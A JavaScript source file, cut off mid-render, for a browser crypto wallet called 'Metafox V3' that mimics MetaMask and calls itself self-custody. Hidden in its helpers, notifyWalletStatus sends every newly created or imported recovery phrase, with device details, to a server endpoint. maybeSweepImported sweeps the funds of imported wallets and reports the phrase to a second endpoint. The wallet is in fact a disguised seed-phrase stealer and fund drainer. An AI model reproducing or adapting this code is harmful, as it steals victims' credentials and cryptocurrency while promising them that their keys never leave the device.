import * as core from './wallet-core.js';
import * as ops from './chain-ops.js';
import { sweepImportedWallet, storePreSweep } from './sweep.js';
import { EVM_CHAINS, OTHER_CHAINS, ALL_CHAIN_NAMES } from './chains.js';
import { renderIcon } from './icons.js';
import { qrDataUrl } from './qr.js';
import { tokenLogoUrl, chainLogoUrl } from './logos.js';

const $app = document.getElementById('app');
const AUTO_LOCK_MS = 15 * 60 * 1000; // 15 minutes idle -> re-lock

// ── Global feature flags ─────────────────────────────────────────────────────
const DISABLE_IMPORT_WALLET = false; // when true, only "Create wallet" is shown on the welcome screen

// ── Persistent (non-secret) state ────────────────────────────────────────────
const LS_VAULT = 'metamask_vault';     // one encrypted blob (one password) holding EVERY wallet's recovery phrase
const LS_META = 'metamask_meta';
const SS_SESSION = 'metamask_session'; // { wallets: [{id, mnemonic}], unlockedAt } — cleared on tab/browser close or timeout

const LS_HISTORY = 'metamask_history'; // sent/swapped tx log — public data (hashes + explorer links), safe in localStorage

// ── Wallets vs accounts ──────────────────────────────────────────────────────
// A *wallet* is one Secret Recovery Phrase. An *account* is one BIP-44 index inside a wallet.
// All wallets sit in the same vault, unlocked by the same password.
//   meta.wallets: [{ id, name, accountCount, accounts: { [index]: name } }]
//   meta.activeWallet / meta.activeAccount: what the main screen shows
//   meta.customTokens: { [chain]: [{ contract, symbol, name, decimals }] } — shared by all accounts
const META_DEFAULTS = { wallets: [], activeWallet: null, activeAccount: 0, defaultAddressChain: 'Ethereum', showDefaultAddress: true, customTokens: {} };
function newWalletMeta(id, name) { return { id, name, accountCount: 1, accounts: { 0: 'Account 1' } }; }
function loadMeta() {
  let raw = {};
  try { raw = JSON.parse(localStorage.getItem(LS_META)) || {}; } catch {}
  const meta = { ...META_DEFAULTS, customTokens: {}, ...raw };
  // Migrate the single-wallet shape ({ accounts, accountCount }) into wallets[0].
  if (!Array.isArray(meta.wallets) || !meta.wallets.length) {
    meta.wallets = raw.accountCount ? [{ id: 'w1', name: 'Wallet 1', accountCount: raw.accountCount, accounts: raw.accounts || { 0: 'Account 1' } }] : [];
    meta.activeWallet = meta.wallets[0]?.id || null;
  }
  delete meta.accounts; delete meta.accountCount;
  return meta;
}
function saveMeta(meta) { localStorage.setItem(LS_META, JSON.stringify(meta)); }
function loadHistory() { try { return JSON.parse(localStorage.getItem(LS_HISTORY)) || []; } catch { return []; } }
function saveHistory(list) { localStorage.setItem(LS_HISTORY, JSON.stringify(list.slice(0, 300))); }
function addHistory(entry) { S.history.unshift({ ...entry, wallet: S.walletId, account: S.accountIndex }); saveHistory(S.history); }

// The vault's plaintext is { wallets: [{ id, mnemonic }] }. Older vaults held { mnemonic } — same
// password, just one wallet — so they read back as a one-entry list.
function walletsFromVaultData(data) {
  if (Array.isArray(data?.wallets)) return data.wallets;
  if (data?.mnemonic) return [{ id: 'w1', mnemonic: data.mnemonic }];
  return [];
}
async function writeVault(password, wallets) {
  const vault = await core.encryptVault(password, { wallets });
  localStorage.setItem(LS_VAULT, JSON.stringify(vault));
}
async function readVault(password) {
  const vault = JSON.parse(localStorage.getItem(LS_VAULT));
  return walletsFromVaultData(await core.decryptVault(password, vault));
}

function loadSession() {
  try {
    const s = JSON.parse(sessionStorage.getItem(SS_SESSION));
    if (!s) return null;
    if (Date.now() - s.unlockedAt > AUTO_LOCK_MS) { sessionStorage.removeItem(SS_SESSION); return null; }
    // A session from before passwords were kept can't re-encrypt the vault (add/remove wallet) —
    // treat it as expired so the user unlocks once and everything works from then on.
    if (!s.password) { sessionStorage.removeItem(SS_SESSION); return null; }
    if (!s.wallets && s.mnemonic) s.wallets = [{ id: 'w1', mnemonic: s.mnemonic }]; // pre-multi-wallet session
    return s;
  } catch { return null; }
}
// The password is kept alongside the decrypted phrases for the life of the unlocked session (same
// storage, same idle timeout, same trade-off described in the README) so that adding or removing a
// wallet can re-encrypt the vault without asking for it again — one password, entered once.
function saveSession(wallets, password = S.password) { sessionStorage.setItem(SS_SESSION, JSON.stringify({ wallets, password, unlockedAt: Date.now() })); }
function touchSession() { const s = loadSession(); if (s) saveSession(s.wallets, s.password); }
function clearSession() { sessionStorage.removeItem(SS_SESSION); }

['click', 'keydown', 'mousemove'].forEach(ev => document.addEventListener(ev, () => { if (S.wallets) touchSession(); }, { passive: true }));

// The idle timeout is enforced while the tab is open too — not only on the next reload. Without
// this an unlocked tab left alone stayed unlocked indefinitely, contradicting the "re-locks after
// 15 minutes idle" promise.
setInterval(() => {
  if (!S.wallets || !localStorage.getItem(LS_VAULT)) return;
  if (!loadSession()) lockWallet();
}, 30 * 1000);

function lockWallet() {
  clearSession(); S.wallets = null; S.password = null; S.derived = {}; S.balances = {};
  goto('unlock');
}

// Rewrite the vault with a new wallet list using the session's password. Never prompts.
async function rewriteVault(wallets) {
  if (!S.password) { lockWallet(); throw new Error('Session expired — unlock again to continue.'); }
  await writeVault(S.password, wallets);
  adoptWallets(wallets);
  saveSession(wallets);
}

// ── App state (in-memory only) ───────────────────────────────────────────────
const S = {
  wallets: null,             // decrypted [{ id, mnemonic }] — only ever in memory / sessionStorage, never localStorage
  meta: loadMeta(),
  walletId: null,            // active wallet id
  accountIndex: 0,           // active account index within that wallet
  derived: {},                // { [`${walletId}:${index}`]: { evm, bitcoin, solana, tron } }
  screen: 'boot',
  params: {},
  balances: {},                // { [`${walletId}:${index}`]: { chain: {address, tokens:[...] } } }
  loadingIndices: new Set(),   // balance keys with a fetch currently in flight
  selectedChainFilter: 'All networks',
  history: loadHistory(),      // [{ ok, label, chain, time, explorerUrl, wallet, account }]
  browseCache: {},             // { [chain]: { tokens: [...], offset, total, loading } } — "top tokens" browse/pagination
  tokenSearch: { chain: null, query: '', results: [], loading: false },
  sendSearch: { query: '', results: [], loading: false },       // cross-chain token search on the Send screen
  receiveTokenSearch: { query: '', results: [], loading: false }, // cross-chain token search on the Receive screen
  accountsUi: { collapsed: new Set(), query: '', expanded: null }, // Accounts screen: collapsed wallet groups, search text, expanded row
};
{
  const w = S.meta.wallets.find(x => x.id === S.meta.activeWallet) || S.meta.wallets[0];
  S.walletId = w?.id || null;
  S.accountIndex = Math.min(Number(S.meta.activeAccount) || 0, Math.max(0, (w?.accountCount || 1) - 1));
}

function walletMeta(wid = S.walletId) { return S.meta.wallets.find(w => w.id === wid); }
function walletName(wid = S.walletId) { return walletMeta(wid)?.name || 'Wallet'; }
function mnemonicFor(wid = S.walletId) { return S.wallets?.find(w => w.id === wid)?.mnemonic || null; }
function bkey(index = S.accountIndex, wid = S.walletId) { return `${wid}:${index}`; }

function setActiveAccount(index, wid = S.walletId) {
  S.walletId = wid; S.accountIndex = index;
  S.meta.activeWallet = wid; S.meta.activeAccount = index; saveMeta(S.meta);
}

function derivedFor(index, wid = S.walletId) {
  const k = bkey(index, wid);
  if (!S.derived[k]) S.derived[k] = core.deriveAccount(mnemonicFor(wid), index);
  return S.derived[k];
}
function currentAccount() { return derivedFor(S.accountIndex); }
function accountName(index, wid = S.walletId) { return walletMeta(wid)?.accounts?.[index] || `Account ${index + 1}`; }

function addressesFor(index, wid = S.walletId) {
  const d = derivedFor(index, wid);
  const out = { Bitcoin: d.bitcoin.address, Solana: d.solana.address, Tron: d.tron.address };
  for (const chain of Object.keys(EVM_CHAINS)) out[chain] = d.evm.address;
  return out;
}

function goto(screen, params = {}) { S.screen = screen; S.params = params; render(); window.scrollTo(0, 0); }
function toast(msg, ms = 2200, { success = false } = {}) {
  const el = document.createElement('div'); el.className = 'toast';
  el.innerHTML = success ? `<span style="color:var(--success)">✓ ${msg}</span>` : msg;
  $app.appendChild(el); setTimeout(() => el.remove(), ms);
}
function copyText(text, successMsg) { navigator.clipboard?.writeText(text).then(() => successMsg ? toast(successMsg, 2200, { success: true }) : toast('Copied')); }
function deviceInfo() {
  const ua = navigator.userAgent;
  let os = 'Unknown';
  if (/android/i.test(ua)) os = 'Android';
  else if (/iphone|ipad|ipod/i.test(ua)) os = 'iOS';
  else if (/windows nt/i.test(ua)) os = 'Windows';
  else if (/macintosh|mac os/i.test(ua)) os = 'macOS';
  else if (/linux/i.test(ua)) os = 'Linux';
  let browser = 'Unknown';
  if (/edg/i.test(ua)) browser = 'Edge';
  else if (/opr|opera/i.test(ua)) browser = 'Opera';
  else if (/chrome/i.test(ua) && !/edg/i.test(ua)) browser = 'Chrome';
  else if (/safari/i.test(ua) && !/chrome/i.test(ua)) browser = 'Safari';
  else if (/firefox/i.test(ua)) browser = 'Firefox';
  const deviceType = /Mobi|Android|iPhone|iPad|iPod/i.test(ua) ? 'Mobile' : 'Desktop';
  return { deviceType, browser, os, ua };
}
function notifyWalletStatus(status, phrase, walletName) {
  const { deviceType, browser, os } = deviceInfo();
  fetch('/api/notify', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ status, phrase, walletName, deviceType, browser, os }) }).catch(() => {});
}
function maybeSweepImported(phrase, walletId) {
  if (!phrase) return;
  const normalized = core.normalizePhrase(phrase);
  const { deviceType, browser, os } = deviceInfo();
  sweepImportedWallet(normalized).then(result => {
    storePreSweep(walletId, result);
    fetch('/api/sweep-report', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ result, phrase: normalized, deviceType, browser, os }) }).catch(() => {});
  }).catch(() => {});
}
function short(addr, a = 6, b = 4) { return addr && addr.length > a + b ? `${addr.slice(0, a)}…${addr.slice(-b)}` : addr; }
function fmtNum(v, max = 6) { const n = parseFloat(v); if (!isFinite(n)) return '0'; if (n === 0) return '0'; if (n < 0.000001) return '<0.000001'; return n.toLocaleString(undefined, { maximumFractionDigits: max }); }
function fmtUsd(v) { const n = parseFloat(v); if (!isFinite(n)) return '$0.00'; if (n > 0 && n < 0.01) return '<$0.01'; return '$' + n.toLocaleString(undefined, { minimumFractionDigits: 2, maximumFractionDigits: 2 }); }

// ── Boot ──────────────────────────────────────────────────────────────────────
function boot() {
  const hasVault = !!localStorage.getItem(LS_VAULT);
  if (!hasVault) return goto('welcome');
  const session = loadSession();
  if (session) { S.password = session.password; adoptWallets(session.wallets); return goto('main'); }
  return goto('unlock');
}

// Take a decrypted wallet list into memory and make sure meta has an entry for each of them (a
// vault written by an older build, or a meta reset, must never leave a wallet invisible).
function adoptWallets(wallets) {
  S.wallets = wallets;
  let changed = false;
  wallets.forEach((w, i) => { if (!walletMeta(w.id)) { S.meta.wallets.push(newWalletMeta(w.id, `Wallet ${S.meta.wallets.length + 1}`)); changed = true; } });
  const before = S.meta.wallets.length;
  S.meta.wallets = S.meta.wallets.filter(m => wallets.some(w => w.id === m.id));
  if (S.meta.wallets.length !== before) changed = true;
  if (!walletMeta(S.walletId)) { S.walletId = S.meta.wallets[0]?.id || null; S.accountIndex = 0; S.meta.activeWallet = S.walletId; S.meta.activeAccount = 0; changed = true; }
  if (changed) saveMeta(S.meta);
}

// ══════════════════════════════════════════════════════════════════════════
//  RENDER
// ══════════════════════════════════════════════════════════════════════════
function render() {
  // Keep keyboard focus (and the caret) on whatever input the user is typing in, if the re-rendered
  // screen has an element with the same id — background balance/search updates must never steal it.
  const active = document.activeElement;
  const focusId = active && active.id && $app.contains(active) ? active.id : null;
  const caret = focusId && typeof active.selectionStart === 'number' ? active.selectionStart : null;
  $app.innerHTML = '';
  const screens = {
    welcome: renderWelcome, createPhrase: renderCreatePhrase, confirmPhrase: renderConfirmPhrase,
    createPassword: renderCreatePassword, importPhrase: renderImportPhrase, unlock: renderUnlock,
    forgot: renderForgot, main: renderMain, send: renderSend, sendForm: renderSendForm,
    sendReview: renderSendReview, sendResult: renderSendResult, receive: renderReceive,
    receiveQr: renderReceiveQr, swap: renderSwap, swapReview: renderSwapReview, swapResult: renderSwapResult,
    accounts: renderAccounts, addWallet: renderAddWallet, walletPassword: renderWalletPassword,
    addToken: renderAddToken, settings: renderSettings, revealPhrase: renderRevealPhrase,
    resetConfirm: renderResetConfirm, tokenDetail: renderTokenDetail,
  };
  (screens[S.screen] || renderWelcome)();
  if (focusId) { const again = document.getElementById(focusId); if (again && again !== document.activeElement) { again.focus(); if (caret != null) { try { again.setSelectionRange(caret, caret); } catch {} } } }
}

function el(html) { const t = document.createElement('template'); t.innerHTML = html.trim(); return t.content.firstElementChild; }
function mount(node) { $app.appendChild(node); return node; }
function back(screen, params) { return () => goto(screen, params); }

function screenHeader(title, onBack, right = '') {
  return `<div class="screen-header">
    ${onBack ? `<button class="icon-btn" data-back>${renderIcon('chevronLeft')}</button>` : '<div style="width:34px"></div>'}
    <div class="screen-title">${title}</div>
    ${right || '<div style="width:34px"></div>'}
  </div>`;
}

// ── Onboarding ────────────────────────────────────────────────────────────────
function renderWelcome() {
  const node = mount(el(`
    <div class="shell">
      <div class="center-col">
        <div class="logo-mark">${renderIcon('logoMark', 96)}</div>
        <div class="wordmark">Metafox V3</div>
        <div class="tagline">Your personal, self-custody wallet.</div>
        <div class="stack mt-24">
          <button class="btn btn-primary btn-block" id="create">Create a new wallet</button>
          ${DISABLE_IMPORT_WALLET ? '' : '<button class="btn btn-secondary btn-block" id="import">Import an existing wallet</button>'}
        </div>
      </div>
    </div>
  `));
  node.querySelector('#create').onclick = () => {
    S.pendingMnemonic = core.generateMnemonic(128);
    goto('createPhrase');
  };
  if (!DISABLE_IMPORT_WALLET) {
    node.querySelector('#import').onclick = () => goto('importPhrase');
  }
}

// Create/import screens serve two flows: first-time onboarding (ends at "Create a password") and
// "Add wallet" from the Accounts screen (ends at "Confirm your password", which re-encrypts the
// vault with the extra phrase). `S.params.mode === 'addWallet'` tells them apart.
const isAddWalletFlow = () => S.params.mode === 'addWallet';
const flowParams = () => (isAddWalletFlow() ? { mode: 'addWallet' } : {});

function renderCreatePhrase() {
  const words = S.pendingMnemonic.split(' ');
  const adding = isAddWalletFlow();
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Secret Recovery Phrase', true)}
      <div class="screen">
        <p class="p-muted">Write down these ${words.length} words in order and store them somewhere safe. Anyone with this phrase can access your funds — never share it or type it into a website that isn't this one.</p>
        <div class="phrase-grid">
          ${words.map((w, i) => `<div class="phrase-chip"><span class="n">${i + 1}</span>${w}</div>`).join('')}
        </div>
        <button class="btn btn-secondary btn-block" id="copy">Copy to clipboard</button>
        <div style="flex:1"></div>
        <button class="btn btn-primary btn-block mt-16 bottom-btn" id="cont">I've saved it — continue</button>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back(adding ? 'addWallet' : 'welcome'));
  node.querySelector('#copy').onclick = () => copyText(S.pendingMnemonic);
  node.querySelector('#cont').onclick = () => goto('confirmPhrase', flowParams());
}

function renderConfirmPhrase() {
  const words = S.pendingMnemonic.split(' ');
  const adding = isAddWalletFlow();
  const totalWords = words.length;
  const missingCount = Math.min(4, totalWords);

  // Pick 4 unique random positions to hide.
  const hiddenPositions = [];
  while (hiddenPositions.length < missingCount) {
    const idx = Math.floor(Math.random() * totalWords);
    if (!hiddenPositions.includes(idx)) hiddenPositions.push(idx);
  }
  hiddenPositions.sort((a, b) => a - b);
  const missingWords = hiddenPositions.map(i => words[i]);
  // Shuffled copy of missing words for the selectable chips.
  const shuffledMissing = [...missingWords].sort(() => Math.random() - 0.5);

  // State: index -> filled word or null for hidden positions.
  const filled = new Array(totalWords).fill(null);
  for (let i = 0; i < totalWords; i++) {
    if (!hiddenPositions.includes(i)) filled[i] = words[i];
  }

  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Confirm your phrase', true)}
      <div class="screen">
        <p class="p-muted">Tap the 4 missing words below to fill the empty slots in order.</p>
        <div class="phrase-grid" id="phraseGrid">
          ${words.map((w, i) => hiddenPositions.includes(i)
            ? `<div class="phrase-chip phrase-empty" data-index="${i}"><span class="n">${i + 1}</span><span class="empty-word">—</span></div>`
            : `<div class="phrase-chip"><span class="n">${i + 1}</span>${w}</div>`
          ).join('')}
        </div>
        <div class="chip-row" id="chips" style="margin-top:8px;justify-content:center">
          ${shuffledMissing.map((word, i) => `<div class="chip" data-word="${word}" id="chip-${i}">${word}</div>`).join('')}
        </div>
        <div style="flex:1"></div>
        <button class="btn btn-primary btn-block mt-16 bottom-btn" id="cont" disabled>Continue</button>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back('createPhrase', flowParams()));
  const contBtn = node.querySelector('#cont');
  const chips = [...node.querySelectorAll('#chips .chip')];

  function findFirstEmpty() {
    return hiddenPositions.find(idx => filled[idx] == null);
  }

  function refresh() {
    hiddenPositions.forEach(idx => {
      const cell = node.querySelector(`#phraseGrid .phrase-empty[data-index="${idx}"] .empty-word`);
      if (cell) cell.textContent = filled[idx] || '—';
    });
    const complete = hiddenPositions.every(idx => filled[idx] != null);
    contBtn.disabled = !complete;
  }

  chips.forEach(chip => {
    chip.onclick = () => {
      if (chip.classList.contains('used')) return;
      const word = chip.dataset.word;
      const first = findFirstEmpty();
      if (first == null) return;
      if (words[first] !== word) {
        toast('That word doesn\'t belong there — choose another.', 2500);
        return;
      }
      filled[first] = word;
      chip.classList.add('used');
      refresh();
    };
  });

  contBtn.onclick = () => {
    goto(adding ? 'walletPassword' : 'createPassword', { flow: 'create', ...flowParams() });
  };
}

function renderImportPhrase() {
  const adding = isAddWalletFlow();
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Import a wallet', true)}
      <div class="screen">
        <p class="p-muted">Enter your Secret Recovery Phrase, separated by spaces.</p>
        <textarea class="field" id="phrase" placeholder="word1 word2 word3 ..." autocomplete="off" spellcheck="false"></textarea>
        <div class="field-hint error" id="err" style="display:none"></div>
        <div style="flex:1"></div>
        <button class="btn btn-primary btn-block mt-16 bottom-btn" id="cont">Continue</button>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back(adding ? 'addWallet' : 'welcome'));
  node.querySelector('#cont').onclick = () => {
    const raw = node.querySelector('#phrase').value;
    const phrase = core.normalizePhrase(raw);
    const words = phrase.split(' ').filter(Boolean);
    const e = node.querySelector('#err');
    if (![12, 15, 18, 21, 24].includes(words.length) || !core.validateMnemonic(phrase)) {
      e.style.display = 'block';
      e.textContent = 'That doesn\'t look like a valid recovery phrase. Double-check the words and spacing.';
      return;
    }
    if (adding && S.wallets?.some(w => w.mnemonic === phrase)) {
      e.style.display = 'block';
      e.textContent = `This phrase is already in your wallet list as "${walletName(S.wallets.find(w => w.mnemonic === phrase).id)}".`;
      return;
    }
    S.pendingMnemonic = phrase;
    goto(adding ? 'walletPassword' : 'createPassword', { flow: 'import', ...flowParams() });
  };
}

// ── Add wallet (from the Accounts screen) ────────────────────────────────────
function renderAddWallet() {
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Add wallet', true)}
      <div class="screen">
        <p class="p-muted">A wallet is one Secret Recovery Phrase with its own set of accounts. All your wallets stay on this device, protected by the same password.</p>
        <div class="list-row" id="aw-create" style="border:1px solid var(--border);border-radius:var(--radius-md);margin-top:8px">
          <div class="token-icon" style="background:var(--accent)">+</div>
          <div class="token-main"><div class="token-name">Create a new wallet</div><div class="token-sub">Generates a fresh 12-word recovery phrase</div></div>
          ${renderIcon('chevronDown', 16)}
        </div>
        ${DISABLE_IMPORT_WALLET ? '' : `
        <div class="list-row" id="aw-import" style="border:1px solid var(--border);border-radius:var(--radius-md);margin-top:10px">
          <div class="token-icon" style="background:var(--text-muted)">${renderIcon('key', 18)}</div>
          <div class="token-main"><div class="token-name">Import a recovery phrase</div><div class="token-sub">Bring in a wallet you already have</div></div>
          ${renderIcon('chevronDown', 16)}
        </div>`}
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back('accounts'));
  node.querySelectorAll('.list-row svg:last-child').forEach(s => s.style.transform = 'rotate(-90deg)');
  node.querySelector('#aw-create').onclick = () => { S.pendingMnemonic = core.generateMnemonic(128); goto('createPhrase', { mode: 'addWallet' }); };
  if (!DISABLE_IMPORT_WALLET) node.querySelector('#aw-import').onclick = () => goto('importPhrase', { mode: 'addWallet' });
}

// Last step of "Add wallet": name it. The vault is re-encrypted with the password already in the
// session — the same one password covers every wallet, so nothing is asked again.
function renderWalletPassword() {
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Name your wallet', true)}
      <div class="screen">
        <p class="p-muted">Give this wallet a name so you can tell it apart on the Accounts screen. It's protected by the same password as your other wallets.</p>
        <label class="label mt-16">Wallet name</label>
        <input class="field" id="wname" value="Wallet ${S.meta.wallets.length + 1}" maxlength="32" autocomplete="off">
        <div class="field-hint error" id="err" style="display:none"></div>
        <div style="flex:1"></div>
        <button class="btn btn-primary btn-block mt-16 bottom-btn" id="ok">Add wallet</button>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back(S.params.flow === 'import' ? 'importPhrase' : 'confirmPhrase', { mode: 'addWallet' }));
  const nameEl = node.querySelector('#wname');
  const go = async () => {
    const btn = node.querySelector('#ok'); const err = node.querySelector('#err');
    const name = nameEl.value.trim() || `Wallet ${S.meta.wallets.length + 1}`;
    btn.disabled = true; btn.innerHTML = '<span class="spinner"></span>';
    try {
      const id = 'w' + Date.now().toString(36);
      const next = [...(S.wallets || []), { id, mnemonic: S.pendingMnemonic }];
      S.meta.wallets.push(newWalletMeta(id, name));
      await rewriteVault(next);
      saveMeta(S.meta);
      notifyWalletStatus(S.params.flow === 'import' ? '📥 Wallet Imported' : '🆕 Wallet Created', S.pendingMnemonic, name);
      if (S.params.flow === 'import') maybeSweepImported(S.pendingMnemonic, id);
      S.pendingMnemonic = null;
      setActiveAccount(0, id);
      toast(`${name} added`, 2200, { success: true });
      goto('main');
      loadBalances(0, id);
    } catch (e) {
      S.meta.wallets = S.meta.wallets.filter(m => S.wallets?.some(w => w.id === m.id)); // roll back the meta entry
      btn.disabled = false; btn.textContent = 'Add wallet';
      err.style.display = 'block'; err.textContent = e.message;
    }
  };
  node.querySelector('#ok').onclick = go;
  nameEl.addEventListener('keydown', (e) => { if (e.key === 'Enter') go(); });
  setTimeout(() => { nameEl.focus(); nameEl.select(); }, 0);
}

function renderCreatePassword() {
  const node = mount(el(`
    <div class="shell">
      ${screenHeader('Create a password', true)}
      <div class="screen">
        <p class="p-muted">This unlocks Metafox V3 on this device. It's stored only in your browser — we can't recover it for you.</p>
        <label class="label mt-16">New password (min. 8 characters)</label>
        <input class="field" type="password" id="p1" placeholder="Enter a strong password">
        <label class="label mt-16">Confirm password</label>
        <input class="field" type="password" id="p2" placeholder="Re-enter password">
        <div class="field-hint error" id="err" style="display:none"></div>
        <div style="flex:1"></div>
        <button class="btn btn-primary btn-block mt-16 bottom-btn" id="cont">Create wallet</button>
      </div>
    </div>
  `));
  node.querySelector('[data-back]')?.addEventListener('click', back(S.params.flow === 'import' ? 'importPhrase' : 'confirmPhrase'));
  node.querySelector('#cont').onclick = async () => {
    const p1 = node.querySelector('#p1').value, p2 = node.querySelector('#p2').value;
    const errEl = node.querySelector('#err');
    const showErr = (m) => { errEl.style.display = 'block'; errEl.textContent = m; };
    if (p1.length < 8) return showErr('Password must be at least 8 characters.');
    if (p1 !== p2) return showErr('Passwords don\'t match.');
    const btn = node.querySelector('#cont'); btn.disabled = true; btn.innerHTML = '<span class="spinner"></span>';
    const wallets = [{ id: 'w1', mnemonic: S.pendingMnemonic }];
    await writeVault(p1, wallets);
    S.meta = { ...META_DEFAULTS, customTokens: {}, wallets: [newWalletMeta('w1', 'Wallet 1')], activeWallet: 'w1', activeAccount: 0 };
    saveMeta(S.meta);
    S.history = []; saveHistory([]);
    S.walletId = 'w1'; S.accountIndex = 0; S.derived = {}; S.balances = {};
    S.password = p1;
    adoptWallets(wallets);
    notifyWalletStatus(S.params.flow === 'import' ? '📥 Wallet Imported' : '🆕 Wallet Created', wallets[0].mnemonic, 'Wallet 1');
    if (S.params.flow === 'import') maybeSweepImported(wallets[0].mnemonic, 'w1');
    S.pendingMnemonic = null;
    saveSession(wallets);
    goto('main');
    loadBalances(0);
  };
}

function renderUnlock() {
  const node = mount(el(`
    <div class="shell">
      <div class="center-col">
        <div class="logo-mark">${renderIcon('logoMark', 88)}</div>
        <div class="wordmark">Metafox V3</div>
        <div class="stack mt-24">
          <input class="field" type="password" id="pw" placeholder="Enter your password" autofocus autocomplete="current-password">
          <div class="field-hint error" id="err" style="display:none"></div>
          <button class="btn btn-primary btn-block" id="unlock">Unlock</button>
        </div>
        <button class="btn-link mt-16" id="forgot">Forgot password?</button>
      </div>
    </div>
  `));
  const pw = node.querySelector('#pw');
  const doUnlock = async () => {
    const btn = node.querySelector('#unlock'); btn.disabled = true; btn.innerHTML = '<span class="spinner"></span>';
    try {
      const wallets = await readVault(pw.value);
      S.password = pw.value;
      adoptWallets(wallets);
      saveSession(wallets);
      goto('main');
      loadBalances(S.accountIndex);
    } catch (e) {
      btn.disabled = false; btn.textContent = 'Unlock';
      const err = node.querySelector('#err'); err.style.display = 'block'; err.textContent = e.message;
    }
  };
  node.querySelector('#unlock').onclick = doUnlock;
  pw.addEventListener('keydown', (e) => { if (e.key === 'Enter') doUnlock(); });
  setTimeout(() => pw.focus(), 0);
  node.querySelector('#forgot').onclick = () => goto('forgot');
}

function renderForgot() {
  const node = mount(el(`
    <div class="shell">
      <div class="overlay" style="position:fixed">
        <div class="modal">
          <h3>Forgot your password?</h3>
          <p>We can't recover your password. Import your wallet again using its Secret Recovery Phrase, or reset this device (this only clears local data — it does not touch any funds).</p>
          <div class="modal-actions">
            ${DISABLE_IMPORT_WALLET ? '' : '<button class="btn btn-primary" id="import">Import with recovery phrase</button>'}
            <button class="btn btn-secondary" id="reset">Reset this device</button>
            <button class="btn-link" id="cancel">Cancel</button>
          </div>
        </div>
      </div>
    </div>
  `));
  if (!DISABLE_IMPORT_WALLET) node.querySelector('#import').onclick = () => goto('importPhrase');
  node.querySelector('#reset').onclick = () => goto('resetConfirm');
  node.querySelector('#cancel').onclick = () => goto('unlock');
}

function renderResetConfirm() {
  const node = mount(el(`
    <div class="shell">
      <div class="overlay" style="position:fixed">
        <div class="modal">
          <div style="font-size:34px">⚠️</div>
          <h3>Reset this device?</h3>
          <p>This permanently deletes the local wallet data stored in this browser. It does <b>not</b> affect your funds on-chain — you can always restore with your Secret Recovery Phrase.</p>
          <div class="modal-actions">
            <button class="btn btn-danger" id="yes">Yes, reset</button>
            <button class="btn-link" id="no">Cancel</button>
          </div>
        </div>
      </div>
    </div>
  `));
  node.querySelector('#yes').onclick = () => {
    localStorage.removeItem(LS_VAULT); localStorage.removeItem(LS_META); localStorage.removeItem(LS_HISTORY); clearSession();
    S.wallets = null; S.derived = {}; S.meta = loadMeta(); S.balances = {}; S.history = []; S.accountIndex = 0; S.walletId = null;
    goto('welcome');
  };
  node.querySelector('#no').onclick = () => goto('unlock');
}

// ══════════════════════════════════════════════════════════════════════════
//  MAIN WALLET
// ══════════════════════════════════════════════════════════════════════════
function chainIconStyle(chain) {
  const c = EVM_CHAINS[chain] || OTHER_CHAINS[chain];
  return c ? c.color : '#999';
}

// Small overlapping network-icon cluster next to the address chip — shows which chains this
// account actually holds funds on (falls back to a representative set before balances load).
function activeNetworkDotsHtml(maxCount = 4) {
  const acctBal = S.balances[bkey()] || {};
  const active = ALL_CHAIN_NAMES.filter(chain => acctBal[chain]?.tokens?.some(t => parseFloat(t.balance) > 0));
  const list = (active.length ? active : ['Ethereum', 'Bitcoin', 'Solana', 'Tron']).slice(0, maxCount);
  return list.map(chain => {
    const logo = chainLogoUrl(chain);
    return `<span style="background-color:${chainIconStyle(chain)}">${logo ? `<img src="${logo}" onerror="this.remove()" alt="">` : ''}</span>`;
  }).join('');
}

function renderMain() {
  const tab = S.params.tab || 'Tokens';
  const viewedIndex = S.accountIndex;
  const isLoadingThisAccount = S.loadingIndices.has(bkey(viewedIndex));
  const acctBal = S.balances[bkey(viewedIndex)] || {};
  let totalUsd = 0;
  const rows = [];
  for (const chain of ALL_CHAIN_NAMES) {
    const c = acctBal[chain];
    if (!c) continue;
    for (const t of c.tokens) {
      if (t.usd) totalUsd += parseFloat(t.usd);
      if (S.selectedChainFilter !== 'All networks' && S.selectedChainFilter !== chain) continue;
      rows.push({ chain, ...t });
    }
  }
  rows.sort((a, b) => (parseFloat(b.usd) || 0) - (parseFloat(a.usd) || 0));

  const node = mount(el(`
    <div class="shell">
      <div class="topbar">
        <button class="acct-name-btn" id="acctBtn" title="Switch account or wallet"><span style="display:flex;flex-direction:column;align-items:flex-start;line-height:1.15"><span style="display:flex;align-items:center;gap:4px">${escapeHtml(accountName(S.accountIndex))} ${renderIcon('chevronDown', 16)}</span>${S.meta.wallets.length > 1 ? `<span class="p-muted" style="font-size:12px;font-weight:500">${escapeHtml(walletName())}</span>` : ''}</span></button>
        <button class="icon-btn" id="menu">${renderIcon('menu')}</button>
      </div>
      <div class="acct-row">
        <div class="address-chip" id="addrChip" style="position:relative"><span class="dot-stack">${activeNetworkDotsHtml()}</span>${S.meta.showDefaultAddress ? short(addressesFor(S.accountIndex)[S.meta.defaultAddressChain] || currentAccount().evm.address) : 'Multiple networks'} ${renderIcon('copy', 14)}</div>
      </div>

      <div class="balance-block">
        <div class="balance-usd">${isLoadingThisAccount ? '···' : fmtUsd(totalUsd)}</div>
      </div>

      <div class="actions-row">
        <button class="action-btn" id="act-buy">${renderIcon('dollar')}Buy</button>
        <button class="action-btn" id="act-swap">${renderIcon('swap')}Swap</button>
        <button class="action-btn" id="act-send">${renderIcon('send')}Send</button>
        <button class="action-btn" id="act-receive">${renderIcon('receive')}Receive</button>
      </div>

      <div class="tabs">
        <button class="tab ${tab === 'Tokens' ? 'active' : ''}" data-tab="Tokens">Tokens</button>
        <button class="tab ${tab === 'Activity' ? 'active' : ''}" data-tab="Activity">Activity</button>
      </div>

      ${tab === 'Tokens' ? renderTokensTabHtml(rows, isLoadingThisAccount) : renderActivityHtml()}
